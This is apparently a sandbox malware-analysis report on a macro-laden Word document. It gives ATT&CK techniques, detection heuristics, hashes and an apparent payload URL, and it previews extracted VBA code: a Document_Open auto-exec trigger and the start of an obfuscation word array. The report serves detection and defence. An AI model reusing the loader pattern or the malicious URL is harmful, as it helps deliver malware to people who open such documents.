MALICIOUS
210
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The sample is a malicious OOXML document containing a VBA project with an auto-executing macro named 'Document_Open'. This macro is obfuscated and uses 'CreateObject' to likely download and execute a second-stage payload. The presence of 'Document_Open' and 'CreateObject' firings, along with the obfuscated loader heuristic, strongly suggests this pattern.
Heuristics 7
-
VBA project inside OOXML medium 5 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://dooo77.imparisystems.com/43333.php In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 51396 bytes |
SHA-256: c6dad5fe5a9f25c10f07869086208479c7f5aed40d47c41ac5f43ec44bedb2bf |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
uRJtiF.Show
End Sub
Attribute VB_Name = "uRJtiF"
Attribute VB_Base = "0{7BE84FEA-0414-4C45-93A4-EB12465ED9C2}{B4CF10B2-1F38-4AE6-AF32-2ECD78189244}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public sSKmLMf As String
Public jbNrfMh As Object
Dim dgfgnnnn(309, 2) As String
Private Sub UserForm_Activate()
On Error Resume Next
uRJtiF.Hide
dgfgnnnn(0, 0) = "a number of"
dgfgnnnn(0, 1) = "'many' or 'some'"
dgfgnnnn(1, 0) = "abundance"
dgfgnnnn(1, 1) = "'enough' or 'plenty'"
dgfgnnnn(2, 0) = "accede to"
dgfgnnnn(2, 1) = "'agree to' or 'allow'"
dgfgnnnn(3, 0) = "accelerate"
dgfgnnnn(3, 1) = "'speed up'"
dgfgnnnn(4, 0) = "accentuate"
dgfgnnnn(4, 1) = "'stress'"
dgfgnnnn(5, 0) = "accompany"
dgfgnnnn(5, 1) = "'go with' or 'with'"
dgfgnnnn(6, 0) = "accomplish"
dgfgnnnn(6, 1) = "'carry out' or 'do'"
dgfgnnnn(7, 0) = "accorded"
dgfgnnnn(7, 1) = "'given'"
dgfgnnnn(8, 0) = "accordingly"
dgfgnnnn(8, 1) = "'so'"
dgfgnnnn(9, 0) = "accrue"
dgfgnnnn(9, 1) = "'add' or 'gain'"
dgfgnnnn(10, 0) = "accurate"
dgfgnnnn(10, 1) = "'correct' or 'exact' or 'right'"
dgfgnnnn(11, 0) = "acquiesce"
dgfgnnnn(11, 1) = "'agree'"
dgfgnnnn(12, 0) = "acquire"
dgfgnnnn(12, 1) = "'get'"
dgfgnnnn(13, 0) = "additional"
dgfgnnnn(13, 1) = "'added' or 'extra' or 'more' or 'other'"
dgfgnnnn(14, 0) = "addressees"
dgfgnnnn(14, 1) = "'you'"
dgfgnnnn(15, 0) = "addressees are requested"
dgfgnnnn(15, 1) = "'please'"
dgfgnnnn(16, 0) = "adjacent to"
dgfgnnnn(16, 1) = "'next to'"
dgfgnnnn(17, 0) = "adjustment"
dgfgnnnn(17, 1) = "'change'"
dgfgnnnn(18, 0) = "admissible"
dgfgnnnn(18, 1) = "'accepted' or 'allowed'"
dgfgnnnn(19, 0) = "advantageous"
dgfgnnnn(19, 1) = "'helpful'"
dgfgnnnn(20, 0) = "adversely impact"
dgfgnnnn(20, 1) = "'hurt'"
dgfgnnnn(21, 0) = "adversely impact on"
dgfgnnnn(21, 1) = "'hurt' or 'set back'"
dgfgnnnn(22, 0) = "advise"
dgfgnnnn(22, 1) = "'recommend' or 'tell'"
dgfgnnnn(23, 0) = "afford an opportunity"
dgfgnnnn(23, 1) = "'allow' or 'let'"
dgfgnnnn(24, 0) = "aforementioned"
dgfgnnnn(24, 1) = "'remove'"
dgfgnnnn(25, 0) = "aggregate"
dgfgnnnn(25, 1) = "'add' or 'total'"
dgfgnnnn(26, 0) = "aircraft"
dgfgnnnn(26, 1) = "'plane'"
dgfgnnnn(27, 0) = "all of"
dgfgnnnn(27, 1) = "'all'"
dgfgnnnn(28, 0) = "alleviate"
dgfgnnnn(28, 1) = "'ease' or 'reduce'"
dgfgnnnn(29, 0) = "allocate"
dgfgnnnn(29, 1) = "'divide'"
dgfgnnnn(30, 0) = "along the lines of"
dgfgnnnn(30, 1) = "'as in' or 'like'"
dgfgnnnn(31, 0) = "already existing"
dgfgnnnn(31, 1) = "'existing'"
dgfgnnnn(32, 0) = "alternatively"
dgfgnnnn(32, 1) = "'or'"
dgfgnnnn(33, 0) = "ameliorate"
dgfgnnnn(33, 1) = "'help' or 'improve'"
dgfgnnnn(34, 0) = "and/or"
dgfgnnnn(34, 1) = "' ? or ? or both'"
dgfgnnnn(35, 0) = "anticipate"
dgfgnnnn(35, 1) = "'expect'"
dgfgnnnn(36, 0) = "apparent"
dgfgnnnn(36, 1) = "'clear' or 'plain'"
dgfgnnnn(37, 0) = "appreciable"
dgfgnnnn(37, 1) = "'many'"
dgfgnnnn(38, 0) = "appropriate"
dgfgnnnn(38, 1) = "'proper' or 'right'"
dgfgnnnn(39, 0) = "approximate"
dgfgnnnn(39, 1) = "'about'"
dgfgnnnn(40, 0) = "arrive onboard"
dgfgnnnn(40, 1) = "'arrive'"
dgfgnnnn(41, 0) = "as a means of"
dgfgnnnn(41, 1) = "'to'"
dgfgnnnn(42, 0) = "as of yet"
dgfgnnnn(42, 1) = "'yet'"
dgfgnnnn(43, 0) = "as prescribed by"
dgfgnnnn(43, 1) = "'in'"
dgfgnnnn(44, 0) = "as to"
dgfgnnnn(44, 1) = "'about' or 'on'"
dgfgnnnn(45, 0) = "as yet"
dgfgnnnn(45, 1) = "'yet'"
dgfgnnnn(46, 0) = "ascertain"
dgfgnnnn(46, 1) = "'find out' or 'learn'"
dgfgnnnn(47, 0) = "assist"
dgfgnnnn(47, 1) = "'aid' or 'help'"
dgfgnnnn(48, 0) = "assistance"
dgfgnnnn
... (truncated)
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 99840 bytes |
SHA-256: e19a2b589c16f6003a3536f7a26e093102748feb06b6764cf891ff5bb8ba99b6 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.